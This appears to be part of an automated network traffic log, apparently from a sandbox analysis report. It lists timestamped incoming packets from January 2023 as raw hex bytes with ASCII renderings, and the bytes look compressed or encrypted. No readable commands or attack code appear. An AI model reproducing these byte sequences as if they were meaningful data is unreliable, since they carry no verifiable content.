2023-01-03 15:29:20 UTC	147	IN	Data Raw: 60 0f ff 84 46 e0 98 55 fb 5a 5e 3f a6 5e 62 bd 00 b1 d2 36 f6 03 0d 02 f6 e5 a4 53 ab c5 9b 16 ec 78 1e fd 1b 73 c3 d2 17 0b 30 21 79 5a 09 75 ec 7d 58 3f eb 41 94 0a fb f9 0f be c4 a4 3c 02 08 00 a5 23 48 67 1e 9d 34 bf 5f 4d d5 96 d2 ed 1f e1 52 aa fc 10 01 15 0a 46 9e ff 42 87 66 0a b9 fa 40 5e d9 fc ee 06 cb 05 c1 95 7f 01 6d 5a 5f ed 66 a8 49 1a 78 1a f2 7f 1c 88 d0 02 1d 16 d5 87 f0 5b 47 47 5a 48 06 11 f4 07 be a6 16 49 ef 09 db 44 b9 26 aa 76 1e 08 c9 6d a2 bb 2d 52 f4 94 8e b1 5d 15 f9 a8 7e dd 68 c0 4c fa 7c 12 ea 16 bd 27 0f 28 8f ea b3 e5 9a 8c 08 80 07 ec 6b 8c b6 9b 11 1c 3f 72 fd 54 c5 58 4a dd 95 3d fd fd c0 37 b7 61 b2 4b d2 9d 23 57 a1 79 3f d7 53 b7 bf 08 97 bb 30 cc f4 3b 89 7c d5 47 cb ef 1f 82 17 c9 8d ef a6 dd bd 48 48 de 27 d7 8c Data Ascii: `FUZ^?^b6Sxs0!yZu}X?A<#Hg4_MRFBf@^mZ_fIx[GGZHID&vm-R]~hL\|'(k?rTXJ=7aK#Wy?S0;\|GHH'
2023-01-03 15:29:20 UTC	148	IN	Data Raw: 07 28 20 fe 77 e9 e1 e3 d7 fd 5f 7a f8 7f e9 e1 ff 3e 3d cc fe eb b7 a6 87 af de fd ef a4 87 de 0d ff fb f4 f0 f8 83 ff 5f a7 87 53 bf ff ef a6 87 91 6b 90 12 bd 7f d6 4f 0f 1d 6b 86 a0 87 22 a3 87 2d f7 ff b7 d1 c3 b2 07 b0 17 b7 9f 0d d2 c3 de 07 be 3d 3d b4 e8 03 f1 55 17 9b 66 c9 35 23 91 0c ba 4f 47 46 e6 1a b8 7f fa c5 d3 72 c5 4d 91 2c 2a 13 23 96 b0 ee 4d 91 2c 45 40 55 32 3e be 18 b9 51 6f be 28 6f d9 17 85 8b 2c 27 c2 d1 13 c1 5c 98 38 81 ec f9 bf 04 f2 df 42 20 d1 f9 4b ae 99 50 d1 1b 21 57 61 a2 8a 8a 4d 91 42 f5 2a d3 18 b9 0a 4f fc 77 84 6a b4 a4 2d 9c 40 02 f6 03 8d c4 f3 09 79 cb e7 03 e9 e4 35 9c 4e 7a 03 74 52 ae fa 8f 88 50 1a b9 02 68 e4 0a 13 ee 30 38 9d ac 93 f7 5d ac e3 c8 fb 0f 46 27 47 00 f2 1e 66 74 72 c5 a9 95 2c 87 72 66 80 56 Data Ascii: ( w_z>=_SkOk"-==Uf5#OGFrM,#M,E@U2>Qo(o,'\8B KP!WaMBOwj-@y5NztRPh08]F'Gftr,rfV
2023-01-03 15:29:20 UTC	149	IN	Data Raw: 53 03 e6 6a 1c 0e 8b ed 1a 31 5a 5d a5 8a bd 84 b9 33 ca db ba 70 cc e5 91 02 cf 46 35 fc 84 dd 19 11 9c 30 9e e2 b1 65 8d 39 8a 4f da 9a 88 e0 a4 7d 1c f9 2d 26 4d 2f 5e 71 d2 6c 7c d2 56 99 8c 58 23 0b 69 5f 8e 93 56 1e 32 69 19 52 e8 a4 a1 ac 99 87 1e eb 9b 81 00 3b bf 17 c5 58 56 4e 6a 3b 2d af 19 72 23 9b 85 90 38 0f fd 33 19 dc 9f 47 b9 1e 1d b0 83 7c 06 98 39 86 3c 70 e9 a7 c3 3e b1 12 23 4a 21 c9 d9 f6 9c c4 4c 56 59 20 a1 c7 25 b6 b3 bc 55 50 c6 b3 18 84 80 07 71 91 82 e0 df 5b da 52 f5 da be b2 d7 bf af 5c 20 85 ee 2b 67 48 5c 20 6b 89 08 04 6c c4 a3 e4 cd a6 94 10 ae bd 78 25 72 ed e8 e3 fe 6d db 01 b8 a7 bf 1f 8d 4a 1e e8 83 73 23 c8 2e 2c a1 4d fb 5a 8c 2d f3 d5 55 b8 44 db 3f 80 eb 77 d8 d3 b3 3d 61 22 dc 4a 14 f4 7a ee 84 17 4b e0 8a b9 d0 Data Ascii: Sj1Z]3pF50e9O}-&M/^ql\|VX#i_V2iR;XVNj;-r#83G\|9<p>#J!LVY %UPq[R\ +gH\ klx%rmJs#.,MZ-UD?w=a"JzK
2023-01-03 15:29:20 UTC	165	IN	Data Raw: 56 45 f1 1a 94 41 35 b0 b1 af 1a 58 0b 09 a8 05 02 94 2b 29 96 cc d6 39 dd 7a 65 24 72 ef e3 ee d5 23 ab 1f fd 2d 0f 67 1e d2 70 bc bf e1 ef f1 86 f5 d8 f0 8f b5 f8 fd ff 7c c3 6b 06 6e f8 45 de b0 29 24 d6 7b 82 bf 61 f7 c7 c1 86 67 fd 8f 1b be be 7f c3 de 42 4e a4 12 c9 b9 fe dd 9d 19 d2 ea d7 c2 ff b4 d5 3a a1 7f ab 96 4b 03 c7 92 af 0d 7f ae d9 b6 15 70 14 f9 e0 e3 5e 35 d7 fb 87 4b aa 1a 14 39 52 2f f2 e0 6d 38 80 7b be 64 6f 12 c2 df 78 a7 9c c7 0b 8a 89 de 11 bd fc 7b 73 9f 68 f2 c1 55 97 aa 7a ab be e4 99 4e f4 86 d5 a5 7a f7 b4 f3 17 93 54 55 ed 1f 2f 56 87 9a 9d 42 31 a0 5d 7a 43 b4 8f ca a5 f7 1b 70 8b 93 72 e9 4a 9e c0 63 82 49 ff a6 a0 b2 1d fe a0 b2 33 fc 41 65 ed 97 0b 2a fb 36 0b 2a bb 64 eb ff bf c4 93 fd f4 9f 8b 27 3b 71 e1 7f 34 9e ec Data Ascii: VEA5X+)9ze$r#-gp\|knE)${agBN:Kp^5K9R/m8{dox{shUzNzTU/VB1]zCprJcI3Ae6d';q4
2023-01-03 15:29:20 UTC	166	IN	Data Raw: 32 ea 66 a4 9b f7 ac 9e ef ac ee 5d b2 b5 bc 53 10 24 c1 3e df af 8c 3a e0 fe 3a 2a d6 f8 21 fa 71 4f cf 76 9c f1 dd ca 6e 65 ad bc c9 4d 0d 6e af 81 e7 17 05 bb a9 6f fe 62 9e 3f e0 a6 1f c1 a4 73 c6 47 86 c2 1a 06 ef c3 cb fa c3 bb 71 ff 77 86 97 ec f9 08 b9 b7 43 1e d8 ac c7 4e 79 fe 1f c2 db 37 ff 80 f0 fe 72 dc 40 f0 16 09 65 38 5f c8 30 0f 8f ff 80 39 f9 87 8d 04 88 6c 54 05 9f d8 3e f6 99 f9 4a 9e 01 af b0 5b 74 ce ae e8 35 a3 98 15 b7 6a 7a fe c5 47 66 0a 3b d0 86 ce 37 8c ad 4a 9f 9e 11 2e 5f d4 0e 8c cd 36 b7 08 19 c2 7c 18 0f 23 6b c2 31 91 df d1 9b fa 66 14 50 c9 e8 7c fa eb 39 ec 6a c0 b5 d0 1a e3 e1 f3 6d 7e 68 1c 83 78 56 48 45 2e ea 03 4e c8 fd e6 12 03 e9 6d 3f 85 11 a5 90 93 75 c8 b4 3c 5a 14 e0 27 a9 1d 7b 21 12 43 00 b4 b9 d6 a8 78 fd Data Ascii: 2f]S$>::*!qOvneMnob?sGqwCNy7r@e8_09lT>J[t5jzGf;7J._6\|#k1fP\|9jm~hxVHE.Nm?u<Z'{!Cx
2023-01-03 15:29:20 UTC	175	IN	Data Raw: 62 d5 69 e3 5b 67 8d 07 ba 9f 40 93 9f ee 55 3d d6 44 9e 87 87 67 b2 26 f1 0c 29 7c d3 e5 ed 9c 61 ed a0 a1 38 83 80 f1 ec c1 f3 00 8f 88 cd b9 d6 25 14 04 6f 4a fe 0a c1 5d 94 a8 f9 27 83 79 8a 21 c7 e8 71 9f 20 84 e4 79 9a e7 d1 00 a8 3c 01 e4 d9 3e 42 89 54 d6 4a 7d 94 ff 25 6d 9e a8 16 8d df d2 6a 0c 2d 77 b9 42 80 ca 1d 91 dd aa 6b b6 91 be 3a a7 17 be 75 28 ff 7f 1a c1 b8 01 c6 e9 40 8e 3b 49 af ea 65 02 6a 27 bd 19 d3 c5 7e 16 4c 5b 2f 18 1f 16 3d a0 c0 8e 37 95 2d 9a af 49 c9 37 75 96 36 d1 55 d2 56 80 d6 a6 46 ec 06 5b 01 53 19 17 a7 e3 c7 90 a1 f2 86 92 63 08 ae e7 b2 d2 14 c1 3e 0a e5 e2 ad e8 dd 42 9d 2e f1 d0 54 73 e9 9e 37 81 34 ad c7 d3 88 c5 0e 8d d8 16 9b e8 e2 a3 da 8e 2c 57 01 c0 36 ee 90 57 f3 a3 d0 f4 24 a0 76 49 8b 76 e3 cf 55 1a 9c Data Ascii: bi[g@U=Dg&)\|a8%oJ]'y!q y<>BTJ}%mj-wBk:u(@;Iej'~L[/=7-I7u6UVF[Sc>B.Ts74,W6W$vIvU
2023-01-03 15:29:20 UTC	191	IN	Data Raw: bb 54 97 36 1a 0d 94 23 a1 84 b3 6e 3e 14 5a 9a d0 8d 85 22 a9 8d 33 7e 49 b0 a6 d6 3e 32 b0 3b b2 2b e0 d7 bd 26 8c 95 04 ad 51 1d ef 67 3c f4 cf a8 f5 d3 a0 f5 d3 60 a3 4f a6 6b f8 95 c4 c8 45 26 c3 ad 04 c6 7e 6e 30 e9 0a c8 e9 b0 c1 ee b9 3a a4 bb 06 8e 61 c7 a8 15 9a 41 77 6a 1a 96 01 3b 1a 11 da 3f d1 b5 08 91 bd e7 43 00 66 3d bd 12 30 5f a6 71 60 34 48 48 0d 7a bd 46 e6 17 9b 4f 0c 1b f8 95 fd 20 41 6c fb e0 43 36 f0 96 e3 78 05 1d b0 6d df 58 86 6d e5 d8 b4 70 c5 a6 57 86 37 8d 8d c2 40 e8 11 df 12 c3 86 a0 73 44 df 86 11 df 32 78 c3 1b 5a 59 c3 22 cd 1d cb f0 ed e5 d3 50 3f 08 c1 f4 d7 dc 39 5b c7 07 00 c8 9a cf af 04 88 f7 1e 3f e2 c5 93 f9 1a 20 88 91 fd 46 60 45 3f 40 10 f5 de ff 80 01 92 7b 91 01 12 41 f7 24 a2 da 13 d0 c9 9d c8 20 1a d4 a9 Data Ascii: T6#n>Z"3~I>2;+&Qg<`OkE&~n0:aAwj;?Cf=0_q`4HHzFO AlC6xmXmpW7@sD2xZY"P?9[? F`E?@{A$
2023-01-03 15:29:20 UTC	192	IN	Data Raw: b2 27 78 09 9b 5f be 86 dd 40 8f be 91 b3 bf 56 55 16 e2 31 53 60 fa af 53 ab 0c 4c f7 75 01 8f 03 27 1b 50 3f ab f0 1d 4c 2f a6 eb 54 bb 29 9e 56 96 74 a1 a2 42 a3 fb 37 2f 0c d0 fd be 31 a9 b4 f3 4b 5d e8 f9 e5 40 b1 86 c2 69 6b b1 44 e7 cc 0d c6 b8 1e dd dc a3 16 eb e8 14 ed d1 24 b2 42 72 e5 b4 d9 8a 1a 9e b6 0a 73 e9 69 5f 8f ca 6f 1e 9a d8 f1 26 dd fe f7 1e e4 c9 e6 fe bd 47 e5 27 98 4f df 1f b8 bd 59 58 5b 24 0c 02 b4 a0 35 27 43 f9 e9 56 43 d8 6d 2d fa 2e 56 51 e7 67 dd d5 14 3a b5 15 1b 61 7e fa 7e 8e 6e 95 d4 3b e9 24 f6 48 a7 ac 91 ea 2c 5f 47 bb 2c 2d 53 df 5f c6 9d d7 7f 51 de 89 49 79 33 7a 15 5c 02 9b d6 83 cb 3c 96 16 5b 46 ee c3 75 96 2f a0 ed 82 f1 ac 23 78 77 0d ef e8 b7 d0 1f db 44 8d 16 6c e0 8b e8 06 e5 2e 4f 4c 88 27 b3 f4 d3 3d 6a Data Ascii: 'x_@VU1S`SLu'P?L/T)VtB7/1K]@ikD$Brsi_o&G'OYX[$5'CVCm-.VQg:a~~n;$H,_G,-S_QIy3z\<[Fu/#xwDl.OL'=j
2023-01-03 15:29:20 UTC	207	IN	Data Raw: 06 fc e4 a5 54 6e a1 dd 47 3c 32 f7 27 86 ca 71 85 e7 fc 6c e8 10 7b 16 04 01 92 db 0b b0 73 c0 6c e7 2b bf 44 ab b1 5c b4 b0 c1 c9 2b ee 27 37 93 1a 8e ac c1 99 bf c5 41 0e 29 ab ce a1 e2 12 de a6 1d 91 0a fa d1 f9 fb 3a 69 27 47 0e 93 93 5e 2a ee c1 fe 03 fd 73 f0 de eb b5 f8 b8 2b 4c 24 12 e4 03 ac 67 54 ba 8e 9c c5 33 0d ec 89 ed 88 78 9e 14 28 0b ab 7d 64 14 b3 43 a6 b3 4b b5 7e a3 1d 1e 19 ef 18 a7 91 4e ea 54 4c 0d b9 8f a6 86 4c f7 c1 62 99 e7 1f 1e 72 24 81 31 3d d1 a3 8d c9 de ef 8d d4 1d 71 01 e1 64 ee 6d 6a 2e a4 48 a9 26 c2 fd 9b bc e9 df b8 22 49 f4 15 e6 91 23 ca bb 26 3a 52 1a 5b 02 7d 11 97 91 cd fa 40 a7 3b e0 f1 f7 7a e8 52 f8 88 d3 87 54 a0 f4 61 40 29 29 b7 47 69 87 ed 30 98 69 42 79 ec 1f 2c a3 fc f8 8e 90 78 b7 5a ba 43 3b 9d a1 a0 Data Ascii: TnG<2'ql{sl+D\+'7A):i'G^*s+L$gT3x(}dCK~NTLLbr$1=qdmj.H&"I#&:R[}@;zRTa@))Gi0iBy,xZC;
2023-01-03 15:29:20 UTC	223	IN	Data Raw: 38 c0 c6 f6 3d a6 25 e7 31 d0 10 02 b1 c0 2b fd 61 db 44 f3 67 0a 86 c9 f1 44 5f 1a 0a 32 47 f3 4b ae c5 1c 7d fc 4f e1 87 74 0c 4d c1 08 3f 5a 0d 37 7e 63 7e a8 f8 ca 37 e0 87 3e ba f2 7f cd 0f 4d d3 f8 21 89 99 cc 11 61 fc 9f ad d7 8e 77 1b bd 7f 03 06 07 ea 9b 3f fe 95 5a 8a e5 94 75 0f 68 5a 8a a5 5b 69 cc db b3 9e f0 4d 81 68 d4 1b f4 5f f4 a5 32 46 d9 12 78 eb 79 ed 2d ef 6e 68 af ce fd 8c 01 23 31 a3 3e 04 db 9f 22 bc c2 65 d8 72 2c d4 d4 c0 d6 ea 9c 33 21 7e f6 12 a1 fe df 51 8f d3 08 8f c4 01 35 d3 7c ad 5d a0 fc 91 a9 f8 b3 6a 1f cc 58 72 26 5f 11 43 96 e8 db 00 46 93 cc e4 bc 33 64 3b 75 22 3a f8 32 86 81 e6 6c 11 4e cc df 79 ad 2d c8 5c 4e 6b d7 0e 4a 6f 7c 88 d1 dc 95 10 c1 a0 5b 7d 7d e8 45 5d 7a 04 4d 6e 7c f8 91 64 98 60 81 73 e9 72 60 42 Data Ascii: 8=%1+aDgD_2GK}OtM?Z7~c~7>M!aw?ZuhZ[iMh_2Fxy-nh#1>"er,3!~Q5\|]jXr&_CF3d;u":2lNy-\NkJo\|[}}E]zMn\|d`sr`B
2023-01-03 15:29:20 UTC	224	IN	Data Raw: 4b 1f 2a af f1 e4 2d 9f 03 02 f5 44 2f 5e 45 d7 a6 d8 12 c5 3b e1 fa c9 63 0c 16 b7 56 0a 0d e9 5a bc 47 be f4 3c 4c 8a 72 a0 73 54 7d 87 25 83 00 ed 3e 47 68 be 5b db 63 d0 2b 7a 02 7d 46 8a ee c3 88 7f d2 9d a5 b8 ba af 38 97 0b 7b 72 2c 33 eb db e4 2a 0b 8f 67 b0 a8 f2 01 34 ce de 95 63 01 52 c4 69 f4 cc 51 a4 0c ef f6 af 77 9b 14 e1 6a f1 af f7 db d1 8d 6b bf e2 c4 05 5f 42 17 ac 5e 9f 40 b2 81 91 f5 ce b1 9e c6 df 29 f8 5b 78 87 c5 87 1c de 58 38 4e 6d cd 79 e5 cf c5 da 89 d7 8d 18 91 d1 89 c4 fe 27 f8 f1 ea 74 a0 fd 47 07 fd b4 7f f0 f3 61 75 2a 7a 41 5a a5 02 9e 74 08 7b d6 45 d7 1f 05 24 cd e3 a4 28 34 1f da c0 ed fb 4f 8a e7 78 84 9c ab 78 27 e9 07 91 9e 9c 08 ab ee 21 97 d0 f3 c1 b9 12 a8 49 c7 17 f2 e2 51 0c e3 b8 69 94 b3 75 92 76 6d 35 df ea Data Ascii: K-D/^E;cVZG<LrsT}%>Gh[c+z}F8{r,3g4cRiQwjk_B^@)[xX8Nmy'tGau*zAZt{E$(4Oxx'!IQiuvm5
2023-01-03 15:29:20 UTC	240	IN	Data Raw: cd 9d fe d1 5c d1 46 73 d8 51 c6 f9 97 36 2d a8 8d c6 a7 bc 45 f7 70 1f 1d cd e3 81 d1 28 df 47 0e 40 54 f0 00 2d 51 87 ed 69 e7 8d ae 07 fa 61 a3 fe d8 51 16 2e 1d c2 09 17 15 ff 38 94 fb f1 85 16 2a 91 f0 0c 65 65 e2 c2 18 e6 2a 4e e6 b5 d2 e5 c8 51 de 8f 9f b3 b6 e2 e7 4d 9b f0 f3 ce 0d f8 b9 74 3d 7c 96 3c 33 ab 96 7e 4d 77 d2 af 9b 1c f4 2b 3c 87 7e cd cf a6 5f df c9 80 af 57 7e 12 5e b9 1c 25 5b e6 b5 1f d1 6f ee b5 6d f0 2d db f9 d7 aa f0 ba a1 17 b8 8c 57 f1 d6 6b 4e 58 10 9e f0 52 f8 8c e2 98 46 4f f8 8f f4 f5 ea 09 af d4 7f 95 71 1b 7e d8 88 91 0d c8 ae 2a b8 55 ba e1 7b ab 18 85 87 27 6d c8 99 95 f1 ca b7 01 9f 8b 83 5c 5a e8 d0 ca 0c 1b ff df 1e 1a 32 50 9e f0 7d b4 f3 2c f3 3f 1b a4 a7 b6 4a df bd f5 41 d3 ad 8c e4 84 0f c1 b5 bb 07 ae 4d fa Data Ascii: \FsQ6-Ep(G@T-QiaQ.8eeNQMt=\|<3~Mw+<~_W~^%[om-WkNXRFOq~*U{'m\Z2P},?JAM
2023-01-03 15:29:20 UTC	241	IN	Data Raw: 1b f1 f6 24 03 41 a7 87 52 17 75 f5 21 d6 b8 46 43 7f a1 95 9e dd 50 f7 29 68 53 74 d9 2b 1c 17 29 e5 ec be 78 e1 c6 93 c0 30 71 d3 d0 cb b8 46 d2 4d 87 5e 66 0c 48 d1 84 08 ae 47 37 1e 26 db dc 15 6f 2f 3d 99 f7 fa 5b 78 90 d0 b1 57 30 7b f7 88 a0 70 e1 20 ef 70 ec 15 13 5e bd 0d 3e 2a 63 20 35 29 65 6c 11 c7 05 ba 6d c9 1d 32 2b d9 bf af 5a 66 e2 b0 4a 5b 2a 48 95 ee ed c5 45 05 e9 de 30 8a bc e9 6c ea 0f db 9d bd 20 be d4 09 6f 80 20 bc 01 1f 5e d6 1e 7c ce 1e c8 f4 0b 96 29 e4 2b 19 b4 3b 7b ec 60 68 04 3a 5b 77 e0 c1 fd d6 da 70 3e aa dc 77 be 7e eb 08 f3 e2 9d ad 86 56 20 a9 89 83 7f 0c b8 ce fc a7 43 1c 1a fa 11 46 dc 07 c4 7c 87 16 dc 0a e4 2e 36 4b 96 4c b9 d8 4c bf 9b 73 5e 7b 33 c2 1b b3 82 32 00 6b fe 31 7f eb 0e 73 c1 12 ae 75 c7 af ee 5a cc Data Ascii: $ARu!FCP)hSt+)x0qFM^fHG7&o/=[xW0{p p^>c 5)elm2+ZfJ[HE0l o ^\|)+;{`h:[wp>w~V CF\|.6KLLs^{32k1suZ
2023-01-03 15:29:20 UTC	246	IN	Data Raw: 5a 87 68 81 4c 52 8b 4d 39 c6 bf 11 30 b5 d4 f0 f5 ef db 3b e7 da 78 67 a0 d5 ee 6f 06 f8 65 e4 30 54 80 4b e1 fa 22 f8 04 b6 a4 3d 77 b7 b0 a2 b1 53 28 d5 d7 c0 95 e4 c3 15 a4 35 f0 b1 cd 9d 7c 98 24 b1 b5 6d 98 78 fb ed bb 4d 21 b6 c6 2d 85 54 fb 5e 7b 5b 74 a1 5b bc fc 4a b6 de 7d 00 7f 0c a2 05 2f ac e0 1a c4 9d 55 d5 2b ed fe 56 b6 d6 4d 0a 06 e7 b6 0a 37 35 fa 85 cf e6 7e 2c 5c dd 78 42 f8 28 40 6d 90 34 01 92 0e 41 52 3c 24 ed 55 7e 52 15 5d 1a af d2 d6 c6 b5 9f 41 fc 89 ec bf 54 e8 34 e3 37 a3 17 00 a9 b3 ac 5b c7 6f 2b b7 92 96 c0 47 17 d1 8e d1 6d da 5e 20 0a d0 6d c0 be 1f 28 c7 8f a4 1c a3 5a 1a fc 76 4e eb e0 df 0c 98 da 81 c1 9d 5d 48 c5 76 9b d2 55 06 1f 8e 4c 3b bc ef b8 dd 9f 15 98 d6 b1 68 da ee 95 91 4c 0b 5b aa 3b 5b b1 5a 18 ca 39 76 Data Ascii: ZhLRM90;xgoe0TK"=wS(5\|$mxM!-T^{[t[J}/U+VM75~,\xB(@m4AR<$U~R]AT47[o+Gm^ m(ZvN]HvUL;hL[;[Z9v
2023-01-03 15:29:20 UTC	254	IN	Data Raw: ae a4 a8 3e e7 e7 fb ac 4d a0 e9 03 e3 2e b3 fb 93 0d d0 ad d6 ab 91 65 e9 ca 2d 78 bf 38 74 cb 09 b9 7c a7 7d bf a9 0b d5 09 c0 fe 00 88 2b 33 94 90 be 30 88 9d 40 06 df 2a 33 1e 78 c1 2b ef 35 c4 da bd 88 11 a6 68 28 ba e9 cf d9 95 c1 14 9b 54 6e b1 77 3a 3a e4 f9 88 98 0c ea bc 33 9c 5f 2d 27 91 03 1a 7e 8e 01 fe 91 29 18 ca 61 1f 68 1a 87 c0 78 9a 8e 8d 69 33 fb ac 3f f2 ad 31 fb e6 bc e5 bb 27 93 23 f3 1d 39 62 4a 31 06 22 0b 9a 1d 2d 75 a7 14 e3 1a 43 81 77 3f df f8 21 8b e3 60 25 95 6f 90 39 4f 90 25 4f 0c f2 6f b6 c9 e2 61 b9 a4 5b 48 7c 1b 63 29 65 85 95 b8 b7 33 e0 61 07 fe 23 d7 85 d1 0b f6 18 30 f5 d5 78 a7 dc b1 03 94 ec 3d 70 6f f7 81 93 c9 21 28 26 9d 37 ae e5 d9 01 b1 63 64 e1 13 e1 03 34 d1 d9 6d ef 6b 77 9e c0 a6 49 2d aa 5c fe 32 df c4 Data Ascii: >M.e-x8t\|}+30@*3x+5h(Tnw::3_-'~)ahxi3?1'#9bJ1"-uCw?!`%o9O%Ooa[H\|c)e3a#0x=po!(&7cd4mkwI-\2
2023-01-03 15:29:20 UTC	270	IN	Data Raw: be 4c 55 cb e4 04 fa e3 65 ec 92 68 92 4c 12 65 83 af c8 0c da 30 a6 24 bb e1 3d df 4c 57 b1 17 0c 2a 97 c8 3a 80 b9 95 c7 9e ca 4b 2d 23 47 2a e4 ca 1e 62 22 d9 d0 08 0b 7c 0e b2 fb 0d 26 b0 da 77 b9 c9 cd 48 87 8d 66 fb 19 fb 39 20 c0 5e 24 13 1e 73 91 86 54 2d c2 85 5c 3e 28 d7 81 30 0b 4b a7 cc d0 fe db 49 82 c3 39 28 9c b1 b7 90 f2 c1 03 1d a4 43 9e 04 bd ab af 7a 95 87 88 29 02 19 c1 72 24 8d e4 99 ed ef 1f d8 6d 6f 39 d0 e1 00 31 53 19 22 95 3d 62 1c 8c 4f e1 8f 78 0d 21 f2 84 f2 6b a8 4c 48 71 d3 3f df 79 5e d5 8a af 00 38 9c 6c 63 ff ba cc da 0f 5e 01 55 bd 92 39 05 a4 85 60 82 79 2c 2d d6 45 e2 3b 4f c4 cc 58 17 70 4d 2b f4 af 38 3b dc f2 84 ee 2a 93 8d a0 73 46 80 b6 c6 82 7e 6e e8 5f 05 7d e2 e7 d1 5d e3 52 d4 77 a6 ba e8 e3 9f b2 c0 5a a8 34 Data Ascii: LUehLe0$=LW:K-#Gb"\|&wHf9 ^$sT-\>(0KI9(Cz)r$mo91S"=bOx!kLHq?y^8lc^U9`y,-E;OXpM+8;*sF~n_}]RwZ4
2023-01-03 15:29:20 UTC	271	IN	Data Raw: b9 14 1e bb 2e ce 93 02 32 cb b7 69 21 9e bd 18 b3 c2 d1 71 89 7f 5a 40 f2 63 54 0b f3 5f 73 21 7f cc f1 4d d0 7e 5c 6d 85 99 06 b9 30 83 3e 87 73 3b ba b3 c9 85 69 31 1e 94 80 df 04 7a 0b 06 85 d3 06 cc 35 4f 31 3f 27 c8 90 67 db 82 17 2d ab 13 ac af a3 ef d7 b3 02 68 08 fc e3 fe 8b dc b5 df 91 ae c4 0f dc 56 43 14 73 69 60 08 60 62 f0 24 50 73 e9 c7 e8 05 aa f9 bb 2d f0 76 ae bf da 91 c2 fc dd a6 92 80 74 fc 96 00 8d bf af 33 9b 98 bd c3 4e 67 f1 64 a1 25 ad b2 95 be a5 97 7f 36 5a 9e fa 7e 11 c1 8d 89 20 dd f9 7f fd 77 74 17 ba 6a 18 4b 1f a0 0b 9d 12 7f 5f 18 80 3e a5 01 4d 00 a0 0b a5 0d 09 69 aa 30 8f 5e 31 81 b9 21 8b d3 ec fe ac 90 90 2a 7d 61 10 92 f0 ea bd f1 2e 4f af 62 71 79 fe a1 98 5c 9e 3e 75 c2 31 74 74 d6 20 48 4b a0 28 c8 90 89 34 6d 18 Data Ascii: .2i!qZ@cT_s!M~\m0>s;i1z5O1?'g-hVCsi``b$Ps-vt3Ngd%6Z~ wtjK_>Mi0^1!*}a.Obqy\>u1tt HK(4m
2023-01-03 15:29:20 UTC	286	IN	Data Raw: 1f 94 09 00 15 b3 1d 60 21 f3 c5 8b d2 85 ef 29 e6 02 73 73 e4 a8 77 df f3 31 c6 aa e6 47 fb 02 5a 9e 16 28 6c a5 78 81 fe 8a 0d a4 8f 8c e0 c9 71 66 8e 60 e7 a7 f9 26 56 06 5c ad cd ae 53 46 37 2c 86 42 37 63 0b 4b ae a3 db 26 c5 21 16 f6 a9 28 56 8f e2 8d 90 c7 ea 8b 43 30 14 0b 30 9d 1e dc b6 11 8f 26 38 d8 87 ee 8b b0 19 1c 54 46 be 20 23 6a 8c 20 e9 f4 28 6c 45 28 b3 88 26 77 f1 be d7 c6 4c c4 c4 e1 95 31 bd b4 59 48 ef 73 87 81 b3 d3 93 03 dc e9 a5 11 ed 8f 79 3d 28 a9 90 e6 40 11 58 93 34 5f 5e 69 ab bd 87 49 74 5d 4b e5 1b 5b d1 eb 89 9b db e3 4a 45 5e 98 b4 1e a2 84 9c f9 e5 33 49 46 18 ea 6d f3 6a 50 12 c8 2c 6f 4b 93 5b 14 3e e7 15 2a ff 97 e9 95 0b 53 f7 aa 54 43 ba 75 f3 72 c0 9f 7a 2b 13 12 89 67 b2 6d 8e a0 52 80 fb d3 ea 61 37 b5 b5 e6 4a Data Ascii: `!)ssw1GZ(lxqf`&V\SF7,B7cK&!(VC00&8TF #j (lE(&wL1YHsy=(@X4_^iIt]K[JE^3IFmjP,oK[>*STCurz+gmRa7J
2023-01-03 15:29:20 UTC	302	IN	Data Raw: 84 99 13 62 b8 9e 9e 1f dc 8a b7 0d a3 5a b1 f2 56 6d 4d f3 c9 9c c6 be 70 39 4b d6 f2 76 c6 0e c0 cb 32 4b 0f da a3 cb 59 72 1b af c8 c5 ee c0 62 93 e4 47 ad 86 08 8b a2 81 bd 13 23 81 4d 29 be 4d 98 5c ea 33 7a c8 df cc fa d6 6a 65 2d 67 a0 3b 1a e5 6f f0 f7 8c 23 08 35 08 39 58 e2 dc 18 50 9a ca 35 50 a6 95 02 bf e0 21 3f 8f e4 1f c3 f2 e7 ac c1 c5 7e b3 45 4e d0 97 51 74 a2 26 25 e4 46 48 c2 fe 1b 70 39 b5 18 22 f8 7e f9 5f fe 3d be 33 64 e7 29 1e bf 69 d6 f1 b8 ef 7f 63 f1 d8 65 1d 30 58 00 67 d3 62 19 8d 7f c5 6f 68 f8 fb 7f 7f a6 f8 fb d4 9f a3 f8 6b a5 55 dc b4 f6 5c fc 8d e5 51 23 e3 25 c4 4d 4f c8 55 6e 8f e9 a5 c7 cb 28 da dd b4 16 59 7c 58 57 ae 81 be 56 32 30 90 73 d3 6d fc 15 31 29 37 96 69 fd 99 86 b2 89 33 4d 7a 6f 26 8a 9c 05 51 15 51 48 Data Ascii: bZVmMp9Kv2KYrbG#M)M\3zje-g;o#59XP5P!?~ENQt&%FHp9"~_=3d)ice0XgbohkU\Q#%MOUn(Y\|XWV20sm1)7i3Mzo&QQH
2023-01-03 15:29:20 UTC	303	IN	Data Raw: 08 87 ee f5 ad 67 b4 65 1d be 54 2a 76 29 3e 60 db 1b b0 fc 0e 15 50 f3 ad 68 b4 88 b4 dd 87 07 cb cd ab d7 54 36 45 ef 68 4a cf dd 42 ca d5 76 5c fc e5 96 bc c1 76 60 f8 9c ad 9b 12 a0 aa 35 c0 d3 79 02 6b 8c e6 4e 9f a9 98 a8 f7 69 17 f5 2a 3f ae 54 a5 6e 52 ce 7e a2 f7 ec 72 55 18 ce fa 30 60 d9 a6 0a d6 62 37 f9 28 f2 e1 6a f4 3d 77 88 0c a1 dd 09 b4 17 9d e8 21 d7 22 48 4a b2 bc cc 22 65 8b cb 2c 16 58 23 0d 64 3a 85 b3 a9 52 69 d0 fb f8 78 28 ba 25 5d 67 1a 65 3a bf c4 26 17 da d9 a9 ad 14 78 fa 3b 55 75 be c7 67 70 7b 4c 81 00 aa ea b8 c9 02 40 e9 3a f4 be fb b9 c9 f9 9e f0 a9 4c d3 70 7b ae 11 47 ae 17 26 07 96 99 9c ed fc f8 22 3c 19 80 1d 27 53 88 eb 41 3b d7 1e 96 1f cf 4d 0d 59 ef 71 bb 83 87 cf 2c 46 76 06 53 ce 6c 2c 96 fc 4f a0 0a b7 ff 05 Data Ascii: geTv)>`PhT6EhJBv\v`5ykNi?TnR~rU0`b7(j=w!"HJ"e,X#d:Rix(%]ge:&x;Uugp{L@:Lp{G&"<'SA;MYq,FvSl,O
